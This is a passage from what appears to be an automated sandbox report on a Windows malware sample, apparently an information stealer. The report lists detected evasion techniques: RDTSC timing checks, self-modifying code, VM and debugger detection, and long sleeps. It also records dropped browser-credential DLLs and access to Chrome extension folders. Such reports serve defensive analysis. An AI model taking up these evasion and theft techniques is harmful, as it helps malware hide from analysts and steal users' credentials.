A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D94219D6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E40E second address: 36E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D8F44CC1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E443 second address: 36E45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB38 second address: 35EB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB42 second address: 35EB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB48 second address: 35EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB50 second address: 35EB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB54 second address: 35EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D8F44CB6h 0x00000017 jmp 00007F34D8F44CBBh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB77 second address: 35EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C61C second address: 38C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C620 second address: 38C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C626 second address: 38C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D8F44CC7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D8F44CB6h 0x0000001a jno 00007F34D8F44CB6h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C658 second address: 38C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C7C4 second address: 38C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: A7E68E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: A7E75F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C11391 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C1AFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C97CFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1FE68E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1FE75F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 391391 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 39AFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 417CFA instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Code function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 715 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1820 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3774 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 427 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6432 Thread sleep count: 715 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep count: 427 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep time: -12810000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7664 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7568 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C60C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd@&h
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: JJEGIJEGDB.exe, 00000005.00000002.1884071590.0000000000BF4000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000008.00000002.1915451030.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000009.00000002.1923451902.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
